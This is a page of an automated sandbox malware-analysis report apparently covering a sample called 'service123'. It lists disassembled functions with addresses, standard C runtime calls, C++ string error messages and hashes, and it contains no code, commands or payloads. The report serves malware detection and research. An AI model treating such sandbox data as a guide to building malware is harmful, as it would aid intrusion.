Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 5be20805619e9472e3dee5af04b82023a18c2d92b943ab2250ec4d9049216432
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 7DD1E871A083158BD700CE29C46434BBFE2AFC5344F18D92DE85CCBB55D776D9898B92

Function 6CAC3140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6CAC3250

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 9d06fdb20056c4d4e8237fc655b1172ba1a0e9fdeb150be6e0af975daf9adacb
Instruction ID: b64daaf4c9b19aa4685873bad8d7d3d33e85bf8d017a93c554a4786fe5cd2e54
Opcode Fuzzy Hash: 9d06fdb20056c4d4e8237fc655b1172ba1a0e9fdeb150be6e0af975daf9adacb
Instruction Fuzzy Hash: 524162B2A092108FC714DF6DD58069AFBE4EF99314F19C56EE8988B315D330D885CB92

Function 6CAC0730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CAC07A0
memset.MSVCRT ref: 6CAC07C4

Strings

basic_string::_M_replace_aux, xrefs: 6CAC0840

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 06ec149cd511149daaf7366f741f17b61a0f0d643a8e126d096c8a5abab547f1
Instruction ID: 15878139f0b95b7f0e6af8bb1e4c7b4798b1d29958677c034de23bdd487f35ef
Opcode Fuzzy Hash: 06ec149cd511149daaf7366f741f17b61a0f0d643a8e126d096c8a5abab547f1
Instruction Fuzzy Hash: DD317EB5B09A908FC7049F2CC4C062ABFF1AFC6604F19856DE9A88B705D631C895CF93

Function 6CA93840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6CA93898
memcpy.MSVCRT ref: 6CA93911

Part of subcall function 6CA95590: memcpy.MSVCRT ref: 6CA95620

Strings

basic_string::_M_replace_aux, xrefs: 6CA938C0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 2b0277175c6a8b592f76de330e82bd908b532531085c7f2568796b10194c6fa2
Instruction ID: 313c1e98d7be2bbd6af78a2e2b4c1cce665a45a95a7bb93aceeac24c8b4e3035
Opcode Fuzzy Hash: 2b0277175c6a8b592f76de330e82bd908b532531085c7f2568796b10194c6fa2
Instruction Fuzzy Hash: 82218072E0A3105FC300AF1D998145EFBF4EB85658F948A6EF88897311D331D858CB92

Function 6CA4A9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA4A9FD
wcslen.MSVCRT ref: 6CA4AA4D

Strings

basic_string: construction from null is not valid, xrefs: 6CA4AA20, 6CA4AA70

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 98d8f9be8c397e6248f73f27d0d1d21975fa34e2a811245c37f8d59a46646802
Instruction ID: e273d07abc13eb10b38bdb05e5c5dfbdfb16d06bd1b3e77f14764fd70e0dce25
Opcode Fuzzy Hash: 98d8f9be8c397e6248f73f27d0d1d21975fa34e2a811245c37f8d59a46646802
Instruction Fuzzy Hash: C41186B1A153148FCB00AF6CD28086AFBF4BF45214F46486DE8C59B311D731DD99CB96

Function 6CA4A5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA4A60D
wcslen.MSVCRT ref: 6CA4A65D

Strings

basic_string: construction from null is not valid, xrefs: 6CA4A630, 6CA4A680

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 98d8f9be8c397e6248f73f27d0d1d21975fa34e2a811245c37f8d59a46646802
Instruction ID: eb6078dd1bdbb85b3e0e6a6657f2c0ef6f8a88eb1c7ea021cabf7c3025c6e436
Opcode Fuzzy Hash: 98d8f9be8c397e6248f73f27d0d1d21975fa34e2a811245c37f8d59a46646802
Instruction Fuzzy Hash: F81198B1A153148FCB00AF2CD2808AAFBF4BF45214F46486DE8C49B311D731DD99CB96

Function 6CA598F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6CA5A30E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2909ec7863780a207fd42be08800e092f39122f2d670c3005fc3b7c0ef206aea
Instruction ID: 5d51a15a0b4b180fbf777e84b144f71fb10d170b4fd469a745a3701a1ff430cf
Opcode Fuzzy Hash: 2909ec7863780a207fd42be08800e092f39122f2d670c3005fc3b7c0ef206aea
Instruction Fuzzy Hash: E5A29C71A043588FDB10CF79C58079DBBB2BF46324FA88658D869AF692D330DC96CB51

Function 6CA587C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6CA591DE

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 5eb33aa92fb6263f9ac611716bde407958bb844f215a7eb43c4a416a0b1dbb45
Instruction ID: 94a387f76e2cad04a92c1c5ee203ee353a65ea523a00a3e124a407bcde480b4c
Opcode Fuzzy Hash: 5eb33aa92fb6263f9ac611716bde407958bb844f215a7eb43c4a416a0b1dbb45
Instruction Fuzzy Hash: ECA29C71A043588FDB10CF79C58478DBBB2BF45324FA88669D869AF692D730DC96CB40

Function 6CA93690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6CA93710

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 3fb7572f2e47f26f3a4687846fa2df2b358bfcade9e0b47aca5c59073a564bcd
Instruction ID: 07813f59ee3bab9686a5cd2e4ab300bc047939d7eb2ed55a58206590ab1f61dd
Opcode Fuzzy Hash: 3fb7572f2e47f26f3a4687846fa2df2b358bfcade9e0b47aca5c59073a564bcd
Instruction Fuzzy Hash: 95015AB151A3449AC300AF6E818665BFFF4AF81228F98896DE5DC87B11C735D488CB62

Function 6CA4A970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA4A98D

Strings

basic_string: construction from null is not valid, xrefs: 6CA4A9B0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b22ec981429c425abf4188a33786fafe464c291078c283711db3e3814642292c
Instruction ID: f19b8081cd196917b214ab608b6c313a88132bdff2737460407c9d682cd2d2ce
Opcode Fuzzy Hash: b22ec981429c425abf4188a33786fafe464c291078c283711db3e3814642292c
Instruction Fuzzy Hash: 3DF05EB1A153148FCB00EF6CD18086ABBF4BF45218F5648ADE8C49B311D732ED89CB96

Function 6CA4A580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA4A59D

Strings

basic_string: construction from null is not valid, xrefs: 6CA4A5C0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b22ec981429c425abf4188a33786fafe464c291078c283711db3e3814642292c
Instruction ID: ea1b60ffd77c7e266e79e257bfa046806ecfb33d1151b09609225dc6d42bb9bb
Opcode Fuzzy Hash: b22ec981429c425abf4188a33786fafe464c291078c283711db3e3814642292c
Instruction Fuzzy Hash: EBF054B1A153148FCB00EF2CD18085ABBF4BF45214B56486DE4849B315D731DD89CB96

Function 6CA4C510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6CA4C568
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA4C570

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 75fa294ac41804d5091edee60c800a8709847aa53df0a3db582cac5e418b8a06
Instruction ID: 9fe37f5d3a3284ede1e4932fa3a97fb799a3544dbb578598cb5d229537c8b604
Opcode Fuzzy Hash: 75fa294ac41804d5091edee60c800a8709847aa53df0a3db582cac5e418b8a06
Instruction Fuzzy Hash: BA012871A082109BCB04EF2DD58096AFBF5ABCA708F5489ADE488DB311D631D949CB97

Function 6CA40740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6CA40798
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA407A0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 94b6de80870b14bc15c18ca1b31ccd9585513ea47838eb4eda71c8c5e02c82b2
Instruction ID: 45354f4201fbe7124c7ec3671d649ca037df598593beb03e23c8792c3321a0d4
Opcode Fuzzy Hash: 94b6de80870b14bc15c18ca1b31ccd9585513ea47838eb4eda71c8c5e02c82b2
Instruction Fuzzy Hash: 9A0146B2A0A3009FD704CF29D881A9BFBE1ABC9354F00992DF488C7700C234D8858B93

Function 6CA646E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44850872e91c441a4e675684f1875d8625265e3ba6dfaee177e3fa6e7f00b9cc
Instruction ID: f10037f2611d687a5782a51efa2285d9a1cbfa7d710d36b6d335aedccbee39ca
Opcode Fuzzy Hash: 44850872e91c441a4e675684f1875d8625265e3ba6dfaee177e3fa6e7f00b9cc
Instruction Fuzzy Hash: DE829071E04298CFDB11CFAAC4A478DBBF1AF46314F198259E865ABB96C334DC85CB41

Function 6CA62CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e00ff7b9eb83d165293dec13e8052250954699685bca57c0711eb80535005354
Instruction ID: 5ed6368b890fc4ea332ce73bc83d5a0fdeab3c75915d602ee37d39e5c0bd4aec
Opcode Fuzzy Hash: e00ff7b9eb83d165293dec13e8052250954699685bca57c0711eb80535005354
Instruction Fuzzy Hash: 64728F70A0A298CFDB11CFAAC48479DBFF1AF06314F188659D4A5ABB91D374D886CB41

Function 6CA6140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec733e51fe0ced11e028837b6818a4756d001014c76e7a146fa0a6f1575c63c
Instruction ID: cd4e185e2dec7eeb3b534fa0a45a0e007f9d567b60775082963b9cc83872d1cf
Opcode Fuzzy Hash: aec733e51fe0ced11e028837b6818a4756d001014c76e7a146fa0a6f1575c63c
Instruction Fuzzy Hash: AB729E74E08298CFDB11CFAAC4847ADBFF1AF06314F188659D5A5ABB91D334E885CB41

Function 6CA62090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2f8d15c1a1b70e90715fbfa41c1467b12e8f5aa3149f0fc4aada2092c494eb7
Instruction ID: 761abe613bdb4c683ef6743d090c787b384b759990fa6bc1725b8a274fa2757e
Opcode Fuzzy Hash: c2f8d15c1a1b70e90715fbfa41c1467b12e8f5aa3149f0fc4aada2092c494eb7
Instruction Fuzzy Hash: 62727B70E093998FDB15CFAAC48878DBBF1AF46314F188759D4A5ABB91C334A885CB41

Function 6CA607D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fb4c9fc3b4b7e6ec18050454632c55a2c73cb3e8c65a38eb5c5be387a72b4c
Instruction ID: bfb9c883d18eca8c0c0d1381086228b5137dd2d1f8328c89598095c645da5e95
Opcode Fuzzy Hash: 02fb4c9fc3b4b7e6ec18050454632c55a2c73cb3e8c65a38eb5c5be387a72b4c
Instruction Fuzzy Hash: 10726970E09298CFDB11CFAAC48479DBFF1AF0A314F188659D4A5ABB91C774A8C5CB41

Function 6CA4F760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA4F8B3

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: e376e0132aca11e61a41956ac6afb3806caf1c00fb4d8db35fe8f95b3dac57e3
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: E8724B74E04258CFCB04CFA9C88499DBBF2BF49314F288659E865AB7A1D735AC81CF51

Function 6CA67A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
